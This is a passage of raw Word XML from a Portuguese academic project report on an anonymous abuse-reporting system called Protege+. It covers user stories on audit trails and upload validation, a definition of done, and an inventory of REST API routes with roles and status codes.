        <w:t xml:space="preserve">2.8.11 US32: ficha completa do caso no painel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gestor clica em um card do Kanban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sistema chama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/denuncias/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e exibe relato, endereço, análise da IA com sua origem declarada, linha do tempo e anexos.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essa leitura ocorre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ela gera um registro de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CONSULTA_SENSIVEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na trilha, com o identificador do caso.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perfil é ATENDENTE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endereço aparece como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[endereco protegido]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e o botão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Excluir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">não é oferecido.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perfil é GESTOR ou ADMIN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endereço completo é exibido e a exclusão fica disponível, exigindo motivo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="us33-tentativas-recusadas-na-trilha"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.12 US33: tentativas recusadas na trilha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usuário autenticado chama uma rota que seu perfil não alcança</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">QUANDO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o Spring Security recusa a requisição antes de ela chegar ao controlador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recusa é registrada na trilha com resultado NEGADO, a ação correspondente à rota, o usuário e a origem.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uma credencial é recusada no login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trilha grava</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LOGIN_NEGADO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, porque tentativa repetida de autenticação é sinal de ataque.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gravação do registro de recusa falha por qualquer motivo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requisição continua sendo recusada: auditar é importante, negar o acesso é mais.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AUDITOR filtra a trilha pelo resultado NEGADO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encontra as tentativas recusadas com data, hora, usuário, perfil e endereço de origem.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uma operação sensível falha por erro do sistema, e não por permissão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registro é gravado com resultado ERRO, distinto de NEGADO, para que a investigação não confunda defeito com sondagem.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="X6a7a98316efc2f94dc9135a4864ee6306f09c54"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.8.13 US34: recusa de arquivo cujo conteúdo não corresponde ao formato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arquivo enviado tem extensão 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de imagem, mas seu conteúdo não começa pela assinatura de nenhum formato aceito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API responde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">415 Unsupported Media Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é gravado em disco.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arquivo é um WebP legítimo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verificação exige</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RIFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nos bytes 0 a 3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rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WEBP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nos bytes 8 a 11, e não apenas o primeiro trecho, porque RIFF é um contêiner usado também por outros formatos.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o arquivo é aceito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o valor gravado em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tipo_conteudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">detectado pela assinatura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não o declarado pelo cliente.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um tipo fora da lista branca chegue ao banco por qualquer caminho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a restrição</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ck_evidencia_tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recusa a linha, mantendo a defesa mesmo se a validação da aplicação for contornada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DADO QUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a verificação de assinatura passa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ENTÃO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">isso garante que o conteúdo é do formato declarado,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que ele seja inofensivo: não há varredura de antivírus, limite declarado na seção 5.8.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efinição-de-pronto-definition-of-done"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.9 Definição de pronto (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Definition of Done</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As reaberturas da seção 2.3 mostraram que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funciona na minha tela</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é um critério insuficiente. Uma user story só é considerada concluída quando cumpre,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">simultaneamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, as seis condições abaixo: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 funcionalidade responde na interface.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Existe um caminho de navegação real que chega até ela, e não apenas um arquivo no repositório.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 endpoint correspondente está documentado no Swagger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com resumo, códigos de resposta e exemplo.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Os erros previstos retornam o código de status correto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não um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genérico que serve para tudo.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Nenhuma resposta expõe dado pessoal além do necessário ao perfil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que a solicitou.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As operações sensíveis geram registro de auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, verificável na aba de trilha.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Existe teste automatizado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cobrindo a regra central da história, ou um roteiro de verificação manual registrado no Anexo D quando o comportamento depende de integração entre camadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O critério 1 é o que teria barrado a US17 na Fase 4. O critério 5 é o que teria barrado a US32 antes que ela existisse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="backlog-consolidado-quadro-final"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.10 Backlog consolidado: quadro final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4"/>
        <w:gridCol w:w="3102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Histórias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Concluídas nesta fase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Herdadas das fases 1 a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US01 a US18 (18)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 sendo 3 reabertas e reentregues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US19, US20, US21, US22, US23, US32 (6)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US24, US25, US26, US27, US33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Manipulação de arquivos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US28, US29, US30, US34, US35 (5)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US31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 histórias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35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Das 17 histórias criadas nesta fase,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">12 têm prioridade Alta ou Crítica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e todas as 12 têm critérios de aceitação escritos na seção 2.8: US19, US20, US23, US24, US25, US26, US28, US29, US31, US32, US33 e US34. A seção traz ainda os critérios da US17, reaberta e reentregue nesta fase, totalizando treze conjuntos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="89" w:name="X38a567e36a0c8c06a1034bb8b17cf950299ee61"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PARTE 3: Implementação de API RESTful e Integração Completa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">O que o enunciado pede</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(a)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Implemente e documente uma API RESTful robusta para o sistema, utilizando as boas práticas apresentadas nos capítulos (rotas, métodos HTTP, status code, tratamento de erros, segurança).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Garanta que as operações CRUD estejam funcionando para os principais recursos do sistema.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Integre a API ao front-end desenvolvido, demonstrando o consumo dos endpoints via interface React (ou outra tecnologia adotada).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A seção 3.1 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com uma subseção dedicada a cada uma das cinco boas práticas citadas: rotas (3.1.2), métodos HTTP (3.1.3), status code (3.1.4), tratamento de erros (3.1.5) e segurança (3.1.6). A seção 3.2 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, recurso por recurso. A seção 3.3 responde ao item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, incluindo a interface React exigida e a integração do portal principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uma observação sobre o método desta Parte: as decisões aqui não se apoiam em preferência pessoal. A semântica de métodos e códigos de status segue o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 9110, que é o padrão STD 97 da IETF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e substituiu a antiga série RFC 723x (IETF, 2022); as decisões de segurança seguem o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10 de 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(OWASP, 2023). Onde o projeto se afasta de uma prática comum, o texto explica contra qual recomendação a escolha foi conferida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="77" w:name="requisito-a-a-api-restful"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Requisito (a): a API RESTful</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="68" w:name="a-fronteira-que-mudou-de-lugar"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.1 A fronteira que mudou de lugar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Até a Fase 4 o Protege+ era uma aplicação que rodava inteiramente no navegador. O dado vivia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, o score era calculado em JavaScript e o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">era uma comparação de texto no cliente. Funcionava como protótipo, mas tinha um problema estrutural: tudo o que o sistema sabia, o usuário podia reescrever com o console aberto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Fase 5 moveu a fronteira. A regra passou a viver no servidor e o navegador virou o que deveria ser: uma interface. A API expõe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">31 rotas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">em 9 controladores, documentadas em OpenAPI 3 e navegáveis em</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/swagger-ui.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vale registrar que a mudança não foi automática. A API ficou pronta e testada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o portal passar a usá-la: durante boa parte desta fase o método</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Backend.criarDenuncia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existia, tinha teste, e ninguém o chamava. Cada parte funcionava isoladamente, que é exatamente o motivo pelo qual a lacuna passou despercebida. A seção 3.3.2 descreve como a integração foi finalmente feita.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="inventário-completo-das-rotas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.2 Inventário completo das rotas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O símbolo 🔒 indica rota que exige o cabeçalho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Canal do cidadão (público por definição)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54"/>
        <w:gridCol w:w="2749"/>
        <w:gridCol w:w="1767"/>
        <w:gridCol w:w="27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é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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e cabeçalho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Exigir login do denunciante inviabilizaria o anonimato, que é a razão de o canal existir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/api/denuncias/protocolo/{protocolo}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ou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protocolo é a credencial: quem o tem, o registrou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/api/denuncias/protocolo/{p}/evidencias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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, 413, 415, 422,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denuncia anonimamente não tem conta para autenticar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/api/vigia/status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 se a IA está em modo Gemini ou Regras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401 ou</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b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Emite o token JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A opção por deixar o registro público não é uma concessão de conveniência: é o que o Decreto 9.492/2018 estabelece para a administração federal, ao determinar que comunicações de irregularidade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainda que de origem anônima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sejam encaminhadas para apuração (BRASIL, 2018c, art. 23, §2.º). Exigir conta para denunciar excluiria justamente quem mais precisa do canal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Painel do órgão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54"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="1505"/>
        <w:gridCol w:w="2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exigido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página com filtros de status, tipo e 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ou 404.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Consulta sensível: gera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400 ou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ou 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/api/denuncias/{id}/responsavel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ou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/api/denuncias/{id}?motivo=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GESTOR,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204</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, ou 400 se faltar o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/api/equipe/{id}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ou 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GESTOR,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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">e cabeçalho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/api/equipe/{id}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GESTOR,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totais por status, tipo, urgência e UF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/api/stats/analitico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o relatório estatístico da Parte 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fluxo de atendimento (as estruturas de dados da Parte 4)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65"/>
        <w:gridCol w:w="3194"/>
        <w:gridCol w:w="3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envolvida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/api/fluxo/fila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PriorityQueue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, ordenada por urgência, score e antiguidade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/api/fluxo/fila/atender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heap binário,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">poll()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">em O(log 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/api/fluxo/pilha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ArrayDeque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">em regime LIFO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/api/fluxo/desfazer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pilha,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pop()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">em O(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Auditoria (restrita)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8"/>
        <w:gridCol w:w="3432"/>
        <w:gridCol w:w="36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 exigido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AUDITOR, ADMIN. Trilha paginada com filtros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/api/auditoria/integridade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AUDITOR, ADMIN. Recalcula a cadeia de hashes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/api/auditoria/acoes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AUDITOR, ADMIN. Catálogo das operações auditadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Evidências (manipulação de arquivos)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3141"/>
        <w:gridCol w:w="916"/>
        <w:gridCol w:w="31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/api/denuncias/protocolo/{p}/evidencias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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; 413 acima de 5 MB; 415 formato recusado; 422 caso já concluído; 429 limite por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/api/denuncias/{id}/evidencias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apenas metadados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/api/evidencias/{id}/arquivo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autenticado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200.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Consulta sensível: gera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/api/evidencias/{id}?motivo=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GESTOR, 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204</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O envio é público, identificado pelo protocolo. Não há como ser diferente: o canal aceita denúncia anônima, e quem denuncia anonimamente não tem conta para autenticar. O que substitui a autenticação são limites: 10 arquivos por denúncia, 5 MB cada, formatos verificados pela assinatura do conteúdo, limite de requisições por origem e bloqueio após a conclusão do caso.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Cs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">leitura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">é o oposto: exige token e gera trilha. Uma foto anexada a uma denúncia de violência é o dado mais sensível que este sistema guarda, e cada acesso a ela precisa ter dono e hora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exportação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60"/>
        <w:gridCol w:w="2706"/>
        <w:gridCol w:w="1584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Retorno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/api/exportacao/denuncias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ATENDENTE, GESTOR, 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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">text/csv</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, auditado, sem o relato, com o endereço mascarado para quem não pode vê-lo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O ATENDENTE exporta, e isso é deliberado: o arquivo carrega exatamente os campos que ele</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">já vê na tela do backlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, com o mesmo mascaramento. Liberar a tela e negar o CSV seria teatro, porque bastaria copiar a tabela à mão. O que protege ali não é a proibição, é o mascaramento no servidor somado ao registro de quem exportou e quando. O AUDITOR fica de fora: ele fiscaliza o uso do sistema, não trabalha os casos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">VigIA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58"/>
        <w:gridCol w:w="3300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/api/vigia/analisar/{id}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Reanalisa a urgência de um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/api/vigia/perguntar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🔒 Pergunta livre.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">O contexto enviado à IA não contém relatos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="X0926da2c0f811668e0385c41fb06b2e225d1ebd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.3 Métodos HTTP: os verbos foram escolhidos, não sorteados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A distinção entre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neste projeto não é estética, e o critério é normativo. O RFC 9110 define método idempotente como aquele em que o efeito pretendido no servidor de várias requisições idênticas é o mesmo de uma única, e classifica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como idempotentes, mas não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(IETF, 2022, seção 9.2.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
